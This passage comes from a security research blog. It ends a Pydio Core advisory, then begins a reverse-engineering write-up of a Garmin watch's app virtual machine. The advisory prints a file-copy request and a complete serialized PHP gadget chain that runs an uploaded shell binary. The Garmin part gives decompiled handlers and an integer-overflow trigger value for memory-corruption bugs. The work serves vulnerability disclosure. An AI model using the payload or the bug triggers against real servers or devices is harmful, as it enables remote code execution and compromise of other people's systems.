get_action=copy&targetBaseName=../.ajxp_meta&dir=%2F&nodes[]=%2Fpayload&dest=%2F&secure_token=sG9TmYIkNsWTEEx5p5qLCHJcty0MfyQ3

Note the HTTP variable targetBaseName which defines a new name for the file copy. This variable is not checked to prevent overwriting special files. After uploading a file called payload containing our PHP gadget, we copy it over the .ajxp_meta file.

The payload file used to overwrite .ajxp_meta may look similar to the PHP gadget below. Tools like phpggc, which store collections of gadgets, include a few that looked promising. However, in my own testing, none of those gadgets worked, and I didn’t dig deep enough to find out why. Instead, I found a class used to generate Captcha images that allows you to define a custom SoX binary path (so the captcha can be read aloud for accessibility). This was my first foray into PHP gadgets, and the path to finding this class was haphazard at best.

O:26:"GuzzleHttp\Stream\FnStream":1:{s:9:"_fn_close";a:2:{i:0;O:10:"Securimage":7:{s:13:"wordlist_file";s:62:"/usr/share/pydio/core/vendor/dapphp/securimage/words/words.txt";s:12:"captcha_type";i:2;s:13:"audio_use_sox";b:1;s:15:"sox_binary_path";s:41:"/var/lib/pydio/personal/atredis/shell.elf";s:13:"database_file";s:39:"/var/lib/pydio/personal/atredis/fdsa.db";s:12:"use_database";b:1;s:9:"namespace";s:4:"fdsa";}i:1;s:15:"outputAudioFile";}}

The above PHP object gadget will attempt to run a binary file that has been uploaded to the user's directory called shell.elf. We do make an assumption about a path on the server by passing an absolute path to the shell binary we uploaded. During testing, the location in the gadget was the default location with no special Pydio configurations.
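
Because the gadget embeds absolute paths, it has to be adjusted for each target. PHP's serialization format prefixes every string with its length in bytes, and unserialize() rejects input where a declared length does not match, so any edited path needs its prefix recomputed. A minimal helper for that (the function name is made up for this example) might look like:

```python
def php_string(value: str) -> str:
    """Serialize value as a PHP string: s:<byte length>:"<value>";"""
    return 's:%d:"%s";' % (len(value.encode("utf-8")), value)


print(php_string("fdsa"))
print(php_string("/usr/share/pydio/core/vendor/dapphp/securimage/words/words.txt"))
```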

This vulnerability affects the last release of Pydio Core (8.2.5) and likely many versions prior. Git blame shows that the code was originally committed in late 2016.

fdsa.png

Pydio Core is considered End-of-Life by the Pydio developers and, as such, will receive no security patches going forward. Pydio Enterprise users should contact Pydio directly to mitigate the issue. The Pydio developers encourage users to upgrade to Pydio Cells, which is a complete rewrite of Pydio in Go and is not vulnerable.

Timeline

* 2020-09-03: Atredis Partners sends an initial notification to vendor, including a draft advisory.

* 2020-10-26: Atredis Partners sends an initial notification to CERT/CC (VRF#20-10-SWJYN).

* 2020-11-17: CVE-2020-28913 assigned by MITRE

* 2020-12-07: Atredis Partners publishes this advisory.


This blog post was written by Brandon Perry, technical peer review by Dion Blazakis, and edited for the web by Lacey Kasten at Atredis Partners.

A Watch, a Virtual Machine, and Broken Abstractions

Garmin Forerunner 235

One upside to living in a cyberpunk-adjacent fever dream is the multitude of (relatively) inexpensive supercomputers you can strap to your body. I recently bought a watch equipped with an array of sensors (and supporting microcontrollers) to record hikes, runs, and rides. The device, a Garmin Forerunner 235, is far from the most advanced piece of technology you can buy to perform these tasks but, so far, has performed well. My partner also has a Garmin watch and rushed to show me all of the customization options available via Garmin’s ConnectIQ Store and App. That's how this all started.

Here at Atredis Partners, I spend a good chunk of time under the delusion I'm a modern Sherlock Holmes. From the outside, I'm just a middle-aged person lacking sleep and, evidently, the wherewithal to shave regularly. But, in my head, I'm hot on the trail of some computational mystery. Each engagement is a frantic sprint from layman to myopic expert. To give our customers the best assessment of their technology, we have to optimize where our time is spent. We need to understand the system design in order to evaluate tradeoffs between attack surface, impact, and complexity. The sooner we understand a technology, the more hours we have to allocate and arrange, Jenga-like, into a plan of attack. The more complete our understanding, the more accurate and complete our determination of impact and severity. When you spend your life understanding the most important (for some definition) parts of hundreds of devices in three-week bursts of effort, every device looks like a new mystery to be solved.

Some people would spend their time away from these mental sprints actually hiking, running, or biking with their cool new watch (and I do that, sometimes). I, instead, needed to understand how this wrist-based computational cluster worked. To be precise, this project was driven by my curiosity, not by nascent privacy concern. This project wasn't an effort to point out all the security bugs or persuade you that balaclava-clad shadows are tracking your every movement. I make no privacy judgement either way -- you'll have to judge your own risk tolerance. Finally, I've enjoyed my Garmin watch and the company was easy to work with while reporting issues. This isn't an indictment of their products.

TL;DR: I'm a nerd. I bought an exercise watch and promptly stopped exercising to tear it apart.

Information Gathering

ConnectIQ

All of this started with a casual mention that Garmin provides a third-party app store, ConnectIQ (abbreviated as CIQ), for Garmin devices. CIQ consists of an app store (https://apps.garmin.com/en-US/), a smartphone app to install CIQ Apps on your Garmin device, and a free software development kit (SDK) for developing CIQ Apps (https://developer.garmin.com/connect-iq/overview/). With my deerstalker on and a pipe firmly between my teeth, the link to the ConnectIQ SDK was the first note I took in my gumshoe notebook. As far as attack surface goes (even in our broader lens of overall system understanding), being able to run code on the device is hard to beat when it comes to tools for understanding a system.

Firmware

The firmware was the next clue, and this one was a gamble. Devices often have encrypted or "encrypted" (encoded with the intent to obfuscate) firmware. In this case, a quick web search turned up a community repository of installable firmware updates for Garmin devices (repository is currently down). I jotted down the Forerunner 235 firmware in my metaphorical steno pad.

Hardware

The firmware runs on some set of programmable devices within the watch. Without knowing which microcontrollers are included in the watch design, reversing is more difficult. Knowing the architecture and memory map of the system-on-chips (SoCs) used will provide more clues towards understanding how the firmware is loaded and executed. Having a bill-of-materials or some approximation of such is not a strict necessity, but provides a good reference going forward while taking apart the firmware. Another web search turned up a teardown for a similar device and the FCC images provided additional clues. These were also recorded in the notepad, providing another category of data to draw from.

The Screaming Hordes

Lastly and reluctantly, it’s time to check if anyone has stolen our fun. Has someone already written up their efforts at understanding a Garmin device? Some searching produced a very nice write-up of a TomTom watch and a handful of file format reverse engineering efforts. This is a rather good outcome -- our fun hadn’t been cut off, but we do have a head start on some of the artifacts we'll need to analyze. I took note of links to the firmware update format (RGN) and a GitHub repository related to the CIQ application format (PRG).

Our Investigative Notes So Far

Device Hardware

Datasheets (based on the 735XT teardown -- not sure about 235)

Development Kits

Device Firmware

Host Tools

Similar Stuff

Moving on to Monkey C

The Game is Afoot

With our initial flurry of web searches done, it was time to start somewhere. As I mentioned above, the ability to run your own code on the watch seems like a great place to start. Heading to the Garmin ConnectIQ site and reading more about the developer tools revealed that CIQ Apps are developed in a custom language called Monkey C. A custom language is surprising enough to require some follow-up research before diving into the actual SDK provided. The question at hand was: why did Garmin decide on a custom language?

Before unraveling that question, it’s important to take a glance at the language. As you can see below, the language appears to be made of JavaScript and Java.

using Toybox.WatchUi;
using Toybox.Graphics;
using Toybox.System;
using Toybox.Lang;

class AtrediFaceView extends WatchUi.WatchFace {
...
    function onExitSleep() {
        System.println("onExitSleep");
        foo();
    }

    function foo() {
        var x = 0xf00d;
        System.println("0xf00d + 1 = " + (x + 1).toString());
    }
}

Using the SDK provided by Garmin, it is possible to compile and run this code:

(venv) ➜  AtrediFace make
monkeyc -o ./bin/AtrediFace.prg \
        -y ../connectiq-sdk-mac-3.1.7-2020-01-23-a3869d977/developer_key \
        -f ./monkey.jungle \
        -d fr235
(venv) ➜  AtrediFace touch /Volumes/GARMIN/GARMIN/APPS/LOGS/AtrediFace.TXT
(venv) ➜  AtrediFace cp bin/AtrediFace.prg /Volumes/GARMIN/GARMIN/APPS/

Notice that it was possible to sideload an App by copying the PRG file onto the watch. When the watch is plugged into the computer, it exposes a file system as a USB Mass Storage device.

Atredis bird on watch face

Once the watch is unplugged, we'll see our beautiful Atredis bird soaring onto the watch face. After the watch face program has executed, debug output can be found on the FAT file system (after, once again, plugging the watch back into the computer).

(venv) ➜  AtrediFace cat /Volumes/GARMIN/GARMIN/APPS/LOGS/AtrediFace.TXT
onExitSleep
0xf00d + 1 = 61454

Now that we're able to code some simple Monkey C, compile it to a PRG file, and run the code on the watch, we can get back to trying to answer the burning question of: But why?

Further reading on the Garmin developer website, forum, and a few web searches provides more background. A Garmin-authored presentation provides the justification for a new language and corresponding virtual machine. The Garmin applications, like Java applications, execute bytecode on a virtual machine. Like Android (and the Infocom Z-machine and Java Card systems before it), the CIQ applications are intended to run on a wide variety of devices. Further, the Garmin devices are limited in resources (computation, memory, and battery) and any runtime/OS environment should be able to restrict each client application's usage of these resources. Finally, the Garmin OS and application execution environment need to be able to enforce access control and isolation -- this includes memory isolation even when the OS lacks a strong virtual memory subsystem. A badly behaving CIQ application should not be able to bring down the entire watch (i.e., Garmin wanted to be better than Windows 95).

The reasoning for running these applications in a virtual machine is clear. Garmin decided to develop a full ecosystem of language, compiler, runtime, and virtual machine to support this. That means we get to reverse-engineer all of it! 🎉 The language is documented in the SDK documentation. The compiler is provided in the SDK and can be reversed from that. The language runtime is implemented in firmware with the interface specified in the SDK. The virtual machine is not publicly documented but can be understood based on a combination of the compiler and the firmware.

This last bit, the details around the virtual machine, is most interesting to me. Using this mapping between concept and implementation, we'll attempt to answer the following questions by reverse engineering the compiler and firmware:

  1. What does the virtual machine executable image look like?

  2. Can the virtual applications mix native code with bytecode?

  3. What is the architecture of the virtual machine?

  4. How does the virtual machine interface with native code for the SDK?

Compiler

The downloadable SDK is mostly Java class files. It decompiles extremely well. The monkeybrains package includes a number of interesting tools but we focus on the compiler and assembler that work together to produce a PRG file. Pulling these apart provides a decent view of the PRG file structure. The high-level structure encapsulates a number of sections enveloped as type-length-value (TLV) structures. These sections include debugging metadata, bytecode, data, resources (e.g., strings for translations, bitmaps), and linking information for the runtime. There is an existing open source project, ciqdb, to parse much of this file format (although it does not handle the sections with the bytecode or the embedded resources yet).

Within the asm package, the Opcode class contains constants with mnemonic names for 55 different opcodes. Now we have (mostly) familiar-looking mnemonics that we can map to opcodes. Further reversing of the decompiled asm package leads us to an understanding of the bytecode stream in the PRG files. Below are the raw bytes and a shorthand disassembly of the foo function from the Monkey C example above.

The PRG bytecode for the foo function is:

00000110: 35 01 01 01 25 00 00 F0  0D 13 01 27 00 80 00 05  5...%......'....
00000120: 30 27 00 80 00 67 0D 2A  18 00 00 02 CF 12 01 25  0'...g.*.......%
00000130: 00 00 00 01 03 27 00 80  00 AF 0D 2A 0F 01 03 0F  .....'.....*....
00000140: 02 02 16 35 01 01 00 12  00 27 00 80 02 9C 0D 27  ...5.....'.....'

The disassembly looks something like:

00000110: 35 01            ARGC 1
00000112: 01 01            INCSP 1
00000114: 25 00 00 F0 0D   IPUSH 0xF00D
00000119: 13 01            LPUTV 1
0000011B: 27 00 80 00 05   SPUSH 0x800005 ; "Toybox_System"
00000120: 30               GETM
00000121: 27 00 80 00 67   SPUSH 0x800067 ; "println"
00000126: 0D               GETV
00000127: 2A               FRPUSH
00000128: 18 00 00 02 CF   NEWS 0x2CF ; "0xf00d + 1 = "
0000012D: 12 01            LGETV 1
0000012F: 25 00 00 00 01   IPUSH 0x01
00000134: 03               ADD
00000135: 27 00 80 00 AF   SPUSH 0x8000AF ; "toString"
0000013A: 0D               GETV
0000013B: 2A               FRPUSH
0000013C: 0F 01            INVOKE 1
0000013E: 03               ADD
0000013F: 0F 02            INVOKE 2
00000141: 02               POPV
00000142: 16               RETURN
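
The listing above can be reproduced with a few lines of Python. This is only a sketch: the opcode table holds just the fourteen opcodes that appear in the foo listing (not the full set of 55), the operand widths are inferred from that listing, and the names OPCODES, FOO_BYTECODE, and disassemble are mine rather than anything from the SDK.

```python
# Opcode byte -> (mnemonic, operand size in bytes). Only the opcodes seen in
# the foo listing are included; operand sizes are inferred from that listing.
OPCODES = {
    0x01: ("INCSP", 1),
    0x02: ("POPV", 0),
    0x03: ("ADD", 0),
    0x0D: ("GETV", 0),
    0x0F: ("INVOKE", 1),
    0x12: ("LGETV", 1),
    0x13: ("LPUTV", 1),
    0x16: ("RETURN", 0),
    0x18: ("NEWS", 4),
    0x25: ("IPUSH", 4),
    0x27: ("SPUSH", 4),
    0x2A: ("FRPUSH", 0),
    0x30: ("GETM", 0),
    0x35: ("ARGC", 1),
}

# Bytes 0x110 through 0x142 of the hexdump above.
FOO_BYTECODE = bytes.fromhex(
    "35 01 01 01 25 00 00 F0 0D 13 01 27 00 80 00 05 "
    "30 27 00 80 00 67 0D 2A 18 00 00 02 CF 12 01 25 "
    "00 00 00 01 03 27 00 80 00 AF 0D 2A 0F 01 03 0F "
    "02 02 16"
)


def disassemble(code, base=0):
    """Yield (address, mnemonic, operand) tuples; operand is None if absent."""
    offset = 0
    while offset < len(code):
        opcode = code[offset]
        if opcode not in OPCODES:
            raise ValueError("unknown opcode 0x{:02X}".format(opcode))
        mnemonic, size = OPCODES[opcode]
        raw = code[offset + 1:offset + 1 + size]
        if len(raw) != size:
            raise ValueError("truncated operand for " + mnemonic)
        # Operands in the listing are big endian (25 00 00 F0 0D is 0xF00D).
        operand = int.from_bytes(raw, "big") if size else None
        yield base + offset, mnemonic, operand
        offset += 1 + size


for address, mnemonic, operand in disassemble(FOO_BYTECODE, base=0x110):
    text = mnemonic if operand is None else "{} 0x{:X}".format(mnemonic, operand)
    print("{:08X}: {}".format(address, text))
```

The symbol and string annotations in the hand-written listing (for example "println") come from other PRG sections, so this sketch prints only the raw operands.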

So far, we've answered our initial question about the executable image format and we can start guessing at the virtual machine organization. Unfortunately, we don't have quite enough information in the compiler/assembler to answer much more about the system definitively. For that, we should move along and start working on the firmware. Specifically, we need to find the portion of the firmware responsible for loading, parsing, and executing these PRG images.

Firmware

A quick google for Garmin Forerunner firmware provides the official Garmin website. While the release notes are good, there does not appear to be a direct download of the firmware images from the website. Luckily, someone else already yanked the firmware from wherever the Garmin Connect app pulls from. (Or, at least, they used to. The archive of firmware was found at http://gawisp.com/perry/forerunner/ but it seems the site is currently down.)

With the firmware in hand, we need to determine how Garmin performs an update. Is the image a flat flash image? Does it contain metadata or a header? Does the format support a partial update? Again, we're lucky because someone has already figured out the type-length-value (TLV) envelope structure of the GCD update files. There is a document providing information on the structure. All it takes is a little time with our best friend hexdump -C to see that the Forerunner 235 update contains two "large" images that can be pulled out. Interestingly, one is the size of the SRAM on the SoC we identified earlier via the teardown (the Maxim MAX32630) and the other is the size of the internal flash. If I had to bet, I'd guess the first is a bootstrap that is written into SRAM so the firmware that is eXecute-In-Place can be replaced. We can write a quick Python script to extract the "main" firmware that we believe is written to the internal flash.

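import struct


class GarminUpdate:
    # The class name and constructor are illustrative scaffolding around the
    # parse() method; only parse() reflects the format described above.
    def __init__(self, tlvs):
        self.tlvs = tlvs

    @classmethod
    def parse(cls, f):
        # GCD update files begin with an 8-byte magic value.
        header = f.read(8)
        if header != b'GARMINd\x00':
            raise ValueError('Unknown firmware format')

        tlvs = []
        while True:
            # Each record is a 16-bit tag and 16-bit length (little endian)
            # followed by `length` bytes of value.
            data = f.read(4)
            if len(data) != 4:
                break

            tag, length = struct.unpack('<HH', data)
            value = f.read(length)
            tlvs.append((tag, length, value))
            print('  0x{:04x}: 0x{:04x}'.format(tag, length))

        return cls(tlvs)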
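
To see the envelope in action without a real update file, here is a small self-contained sketch that builds a synthetic GCD blob in memory and totals the payload bytes per tag. The tag values (0x0001, 0x02BD) are made up for the demonstration, and the helper names iter_tlvs and build_gcd are mine. Since the length field is only 16 bits, a large image presumably spans several records, which is why summing per tag is a handy way to spot it.

```python
import io
import struct

MAGIC = b"GARMINd\x00"


def iter_tlvs(f):
    """Yield (tag, value) pairs from a file-like object holding a GCD blob."""
    if f.read(len(MAGIC)) != MAGIC:
        raise ValueError("Unknown firmware format")
    while True:
        head = f.read(4)
        if len(head) != 4:
            return
        tag, length = struct.unpack("<HH", head)
        value = f.read(length)
        if len(value) != length:
            raise ValueError("truncated TLV record")
        yield tag, value


def build_gcd(records):
    """Serialize (tag, value) pairs into the same envelope (test helper)."""
    blob = MAGIC
    for tag, value in records:
        blob += struct.pack("<HH", tag, len(value)) + value
    return blob


# Hypothetical tags: one small metadata record and one payload split in two.
sample = build_gcd([(0x0001, b"\x01"), (0x02BD, b"A" * 16), (0x02BD, b"B" * 8)])

totals = {}
for tag, value in iter_tlvs(io.BytesIO(sample)):
    totals[tag] = totals.get(tag, 0) + len(value)

for tag, size in sorted(totals.items()):
    print("tag 0x{:04x}: {} bytes".format(tag, size))
```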

With the main firmware extracted, our ARM RE fingers should really be starting to itch. From the datasheet of the MAX32630, we know the internal flash is probably mapped starting at 0x0. Since the extracted flat image is mapped directly, there is no need for a dedicated IDA loader plugin -- the IDA load UI is flexible enough. Once the image is loaded and the appropriate architecture for the Cortex-M is selected, adding segments for SRAM and the peripheral ranges provides a solid starting point for the reverse engineering effort.

After running some Thumb function finding heuristic scripts against the initial database, what next? Our first goal is to find the code responsible for parsing and running the virtual machine programs. The parsing logic is probably the better of the two to start with -- the identification of the parsing logic will also help identify the runtime representation of the program. In most cases, the parsing logic will output an internal runtime representation. Understanding this runtime structure provides context for all reverse engineering of the execution or processing surrounding the loaded program. In this case, taking the time to create and refine the internal runtime context structure is worth the effort.

A quick look at the strings identified by IDA doesn't immediately provide any hints around the PRG processing. When strings are lacking, the next best handhold is using unique constants. In this case, the PRG tags are unique 32-bit integers perfect for IDA's "Search -> Immediate value...". Searching for 0xd000d000, the main PRG header tag, reveals a single function passing this value into a sub function. Perfect!

unsigned int __fastcall read_prg_header(int a1, _DWORD *a2, int a3)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v4 = a1;
  v5 = prg_extract_section_data(a1, 0xD000D000, &a3a, &out_offset, 1u);
  v6 = (void *)mem_alloc(a3a.length, 3, &handle);
  handle = v6;
  if ( !v6 )
    goto LABEL_2;
  if ( v5 == (void *)1 )
  {
    v9 = (int *)mem_pointer_borrow(v6);
    v10 = v9;
    v11 = file_read_(v4, v9, a3a.length);
    if ( v11 == a3a.length )
    {
      v17 = *v10;
      if ( a2 )
      {
        v12 = a3a.length;
        v13 = v17;
        *a2 = a3a.tag;
...

Using this as a starting point and walking up and down the call stack surrounding this function reveals, as we hoped, the code for parsing a PRG file. We will spare the reader three weeks of reverse engineering play-by-play as the virtual machine, deemed the "TVM" by Garmin, is analyzed and the runtime objects and utilities are reversed. In addition to the TVM, the OS structures and APIs need to be reversed along the way. The watch runs a Garmin developed OS but context clues and a few useful strings help determine the general OS object APIs. The OS provides abstractions for objects such as semaphores, tasks, events, and queues. A layer above this provides a file system abstraction and memory allocation routines. The TVM layers a richer abstraction on the memory allocation logic for tracking TVM program quotas and for maintaining reference counts on allocated buffers.

The TVM is a stack-based virtual machine. Each runtime value is stored along with the accompanying type. Opcodes manipulate values stored on the stack and can reference local variables reserved on the stack by index. Values are created at runtime by loading data from the PRG data section or via immediate values embedded in the bytecode stream. Once loaded onto the stack, the value can be manipulated and passed around the system. All runtime allocations are tracked per TVM instance. This tracking is an effort to prevent a buggy or malicious program from taking down the entire system via resource exhaustion. Runtime objects are also reference counted, as noted above, and are deterministically garbage collected when the last reference is released.
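
As a rough illustration of that description, here is a toy Python model that runs the arithmetic half of the foo function from the earlier disassembly. Several details are assumptions on my part rather than confirmed TVM behavior: that LPUTV pops the top of the stack into the local slot, that locals sit at frame + 1 + index, and the type tag names. Reference counting and allocation tracking are left out entirely.

```python
# Toy typed stack machine; each slot is a (type, value) pair.
NULL, INT = "NULL", "INT"


def run(program, stack, frame=0):
    """Execute a list of (mnemonic, operand) pairs against `stack`."""
    for mnemonic, operand in program:
        if mnemonic == "INCSP":
            # Reserve `operand` local variable slots, initialized to null.
            stack.extend([(NULL, 0)] * operand)
        elif mnemonic == "IPUSH":
            stack.append((INT, operand))
        elif mnemonic == "LPUTV":
            # Assumption: pops the top value and stores it in the local.
            stack[frame + 1 + operand] = stack.pop()
        elif mnemonic == "LGETV":
            stack.append(stack[frame + 1 + operand])
        elif mnemonic == "ADD":
            (_, rhs), (_, lhs) = stack.pop(), stack.pop()
            stack.append((INT, lhs + rhs))
        else:
            raise ValueError("unsupported mnemonic " + mnemonic)
    return stack


# Slot 0 stands in for frame bookkeeping; local 0 is the single argument
# announced by ARGC 1 (presumably the object itself).
stack = [("FRAME", 0), ("OBJECT", "self")]
program = [
    ("INCSP", 1),       # reserve local 1 (x)
    ("IPUSH", 0xF00D),
    ("LPUTV", 1),       # x = 0xf00d
    ("LGETV", 1),
    ("IPUSH", 1),
    ("ADD", None),      # x + 1
]
print(run(program, stack)[-1])
```

The value left on top of the stack is the integer 61454, matching the debug output from the watch.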

During analysis of the TVM context block, the PRG loading, and the runtime initialization, we're able to make some progress toward understanding how the virtual machine interacts with the native runtime (one of our overall goals). Below is an excerpt from a function we named tvm_run_function. This function is used to enter a TVM function based on a TVM virtual address, for example when handling a CALL opcode or to run an initialization function after loading the PRG. We can see that, based on the high bits of the address, the TVM either executes a native function based on a function pointer table (tvm_native_methods) or executes bytecode by entering the opcode dispatch loop (tvm_execute_opcodes).

  if ( (function_addr.value & 0xFF000000) == 0x40000000 )
  {
    v17 = LOWORD(function_addr.value);
    if ( LOWORD(function_addr.value) > 0xC5u )
    {
      v8 = 15;
      goto LABEL_4;
    }
    ctx->pc_ptr = (char *)tvm_native_methods[LOWORD(function_addr.value)];
    v18 = tvm_native_methods[v17]((int)ctx, a4);
    if ( v18 == 21 )
      return v8;
    if ( tvm_native_methods[v17] != sub_10F18C )
    {
      if ( v18 )
        goto LABEL_15;
      v18 = tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
    }
    if ( !v18 )
      v18 = tvm_op_return(ctx);
  }
  else
  {
    v18 = tvm_tvmaddr_to_ptr(ctx, function_addr.value, &ctx->pc_ptr);
    if ( !v18 )
      v18 = tvm_execute_opcodes(ctx);
  }
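
The address test in that excerpt boils down to a small classifier, sketched here in Python. The constants are taken from the decompilation (the 0x40 top byte, the 0xC5 index limit, and the value 15 assigned on the out-of-range path); the function and constant names are mine, and treating 15 as the returned error code is an assumption.

```python
NATIVE_SPACE = 0x40000000      # top byte 0x40 selects the native table
MAX_NATIVE_INDEX = 0xC5        # largest index accepted by the excerpt
ERR_BAD_NATIVE_INDEX = 15      # value assigned on the out-of-range path


def classify_function_address(addr):
    """Mirror the branch taken by tvm_run_function for a TVM address."""
    if (addr & 0xFF000000) == NATIVE_SPACE:
        index = addr & 0xFFFF  # LOWORD(); bits 16-23 are ignored
        if index > MAX_NATIVE_INDEX:
            return ("error", ERR_BAD_NATIVE_INDEX)
        return ("native", index)
    return ("bytecode", addr)


for addr in (0x40000003, 0x400000C6, 0x10000110):
    print(hex(addr), classify_function_address(addr))
```

One detail this makes visible: only the low 16 bits pick the table entry, so an address such as 0x40FF0003 lands on the same native method as 0x40000003.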

After weeks of reverse engineering and marking up an IDA database, we've answered questions 2, 3, and 4 pretty well. Additionally, along the way, we've identified a handful of code paths that appear to violate contracts made amongst the virtual machine runtime. Maybe the real treasures were the bugs we found along the way?

TVM Opcode Bugs

While reversing the TVM system, we noted a number of the opcode handlers performed operations that appeared to break the virtual machine abstraction. Below, we'll follow up on each of those. More information about each vulnerability, including the disclosure timeline, can be found at ATREDIS-2020-0004, ATREDIS-2020-0005, ATREDIS-2020-0006, and ATREDIS-2020-0007.

NEWA

One instruction, NEWA, is used to create a runtime array of TVM values of a fixed size. The array is initialized with the null value. NEWA expects a number-like value on the top of the stack indicating the size of the array. Decompilation of the NEWA opcode implementation shows just the one check on the length value (ensuring it is not negative) before passing it to tvm_value_array_allocate for the array size calculation.

int __fastcall tvm_op_newa(struct tvm *ctx)
{
  struct stack_value *sp;
  int rv;
  int length;
  struct tvm_value value;

  sp = ctx->stack_ptr;
  length = 0;
  value = *sp;
  rv = tvm_value_to_int(ctx, &value, &length);
  if ( !rv ) {
    if ( length < 0 )
    {
      rv = 10;
      tvm_value_decref(ctx, &value);
      return rv;
    }

    rv = tvm_value_array_allocate(ctx, length, ctx->stack_ptr);
    if ( !rv )
    {
      rv = tvm_value_decref(ctx, &value);
      if ( !rv )
        return tvm_value_incref(ctx, ctx->stack_ptr);
    }
  }
  tvm_value_decref(ctx, &value);
  return rv;
}

The tvm_value_array_allocate function will perform the unchecked array size calculation as shown below.

int __fastcall tvm_value_array_allocate(struct tvm *ctx, int length, struct tvm_value *array_value)
{
  unsigned int allocation_size; // r6
  int rv; // r0 MAPDST
  struct tvm_value_array_data *array_data; // r9
  void *array_data_handle; // [sp+4h] [bp-24h] MAPDST

  array_data_handle = 0;
  allocation_size = 5 * length + 15;
  rv = tvm_alloc_for_app(ctx, allocation_size, &array_data_handle);
  if ( !array_data_handle )
    return 7;
  array_data = (struct tvm_value_array_data *)mem_pointer_borrow(array_data_handle);
  memset((int *)array_data, 0, allocation_size);
  array_data->m_0x01 = 1;
  array_data->type = ARRAY;
  array_data->length = length;
  mem_pointer_release(array_data_handle);
  array_value->type = ARRAY;
  array_value->value = (unsigned int)array_data_handle;
  return rv;
}

The allocation size calculation can overflow the 32-bit integer and can be triggered by creating an array of size 0x33333333. This value is still positive for a 32-bit integer (passing the check in the tvm_op_newa function). When the allocation_size is calculated, the result will overflow the 32-bit unsigned int:

>>> length = 0x33333333
>>> allocation_size = 5 * length + 15
>>> hex(allocation_size)
'0x10000000e'
>>> hex(allocation_size & 0xffffffff)
'0xe'

The original length value (0x33333333) is stored in the resulting tvm_value_array_data and this is the value used to check bounds during the array read and write operations (performed by the AGETV and APUTV instructions).

This can be directly triggered through Monkey C and does not require direct bytecode manipulation to create a proof-of-concept. There are a number of additional constraints to turn this into a reliable read/write anything anywhere primitive, but it provides a strong exploit building block.
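
For a slightly more general view of the same arithmetic, the sketch below models the 32-bit wrap, finds the smallest length that triggers it, and shows what a range check before the multiplication could look like. The function names are mine and the checked variant is purely illustrative; it is not taken from any Garmin fix.

```python
UINT32_MAX = 0xFFFFFFFF


def newa_allocation_size(length):
    """Model `5 * length + 15` as computed in a 32-bit unsigned register."""
    return (5 * length + 15) & UINT32_MAX


def first_wrapping_length():
    """Smallest non-negative length whose size calculation wraps."""
    return (UINT32_MAX - 15) // 5 + 1


def checked_allocation_size(length):
    """Illustrative guard: reject lengths whose size would not fit."""
    if length < 0 or length > (UINT32_MAX - 15) // 5:
        raise OverflowError("array length too large")
    return 5 * length + 15


print(hex(first_wrapping_length()))                        # 0x33333331
print(hex(newa_allocation_size(first_wrapping_length())))  # 0x4
print(hex(newa_allocation_size(0x33333333)))               # 0xe
```

Every length from 0x33333331 up to the largest positive 32-bit integer passes the sign check in tvm_op_newa yet yields an allocation far smaller than the array it claims to hold.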

LGETV and LPUTV

The instructions LGETV and LPUTV are used to read and write to a local variable. The virtual machine maintains a frame pointer used to point at the start of the frame on the stack. The entry of a method will reserve some space on the stack to store local variables. The LGETV and LPUTV instructions expect a single byte operand specifying the local variable index for that instruction. The implementation does not check that this index is within the previously allocated local variable space as seen below.


int __fastcall tvm_op_lgetv(struct tvm *ctx)
{
  char *pc_at_entry; // r3
  struct stack_value *sp_at_entry; // r1
  int local_var_idx; // t1
  struct stack_value *local_var_ptr; // r2
  struct stack_value *v6; // r5

  pc_at_entry = ctx->pc_ptr;
  sp_at_entry = ctx->stack_ptr;
  local_var_idx = (unsigned __int8)*pc_at_entry;
  ctx->pc_ptr = pc_at_entry + 1;
  local_var_ptr = &ctx->frame_ptr[local_var_idx + 1];
  ctx->stack_ptr = sp_at_entry + 1;
  sp_at_entry[1] = *local_var_ptr;
  v6 = (struct stack_value *)&ctx->m_0x007b;
  tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
  tvm_value_decref(ctx, v6);
  ctx->m_0x007b = (struct tvm_value)*ctx->stack_ptr;
  tvm_value_incref(ctx, (struct tvm_value *)v6);
  return 0;
}

The unchecked offset from the frame_ptr of the execution context provides a path to both memory access past the end of the TVM context allocation (the stack is allocated at the end of this structure) and a primitive to construct a use-after-free taking advantage of the way values outside of the valid stack are treated.
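
To get a feel for the reach of that unchecked index, here is a small Python sketch. It assumes each stack slot is 5 bytes (a guess based on the 5 * length term in the array allocation and the 4 + 1 byte copy in the DUP handler) and that locals start one slot past frame_ptr, as in the decompilation. The function names and the is_valid_local check are hypothetical; the latter is the kind of test the handler appears to be missing.

```python
SLOT_SIZE = 5  # assumed size in bytes of one stack slot (type + value)


def local_slot_byte_offset(index):
    """Byte offset from frame_ptr touched by LGETV/LPUTV for `index`."""
    if not 0 <= index <= 0xFF:
        raise ValueError("operand is a single byte")
    return (index + 1) * SLOT_SIZE


def is_valid_local(index, locals_reserved):
    """Hypothetical check: is `index` inside the reserved local slots?"""
    return 0 <= index < locals_reserved


# foo reserves two locals: one argument (ARGC 1) plus one INCSP slot.
locals_reserved = 2
for index in (1, 2, 0xFF):
    print(index, is_valid_local(index, locals_reserved),
          local_slot_byte_offset(index))
```

With only two locals reserved, an operand of 0xFF would address a slot 1280 bytes past frame_ptr under these assumptions.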

NEWS

The NEWS instruction creates a runtime string object from a string definition structure in the data section of the PRG. Upon execution, this instruction pushes a new tvm_value of type STRING onto the top of the stack. The value of the string is loaded from an address provided as a 32-bit operand. The data at the provided address is expected to contain a string definition of the form:

uint8_t one; // 0x01
uint16_t length;
uint8_t utf8_string[length];

The string data buffer is allocated to hold length bytes and then a function similar to strcpy is used to populate it. The strcpy-like function will only stop when a NUL byte is encountered, possibly overflowing the buffer beyond the size of the initial allocation.

int __fastcall tvm_op_news(struct tvm *ctx)
{
  int tvm_addr_for_string; // r0
  struct stack_value *v3; // r2
  int result; // r0

  tvm_addr_for_string = tvm_fetch_int((int *)&ctx->pc_ptr);
  v3 = ctx->stack_ptr;
  ctx->stack_ptr = v3 + 1;
  v3[1].type = NULL;
  ctx->stack_ptr->value = 0;
  result = tvm_value_load_string(ctx, tvm_addr_for_string, (int)ctx->stack_ptr);
  if ( !result )
    result = tvm_value_incref(ctx, (struct tvm_value *)ctx->stack_ptr);
  return result;
}

int __fastcall tvm_value_load_string(struct tvm *ctx, int string_def_addr, int string_value_out)
{
  int rv; // r0
  unsigned __int8 *string_def; // [sp+4h] [bp-14h]

  rv = tvm_tvmaddr_to_ptr(ctx, string_def_addr, &string_def);
  if ( !rv )
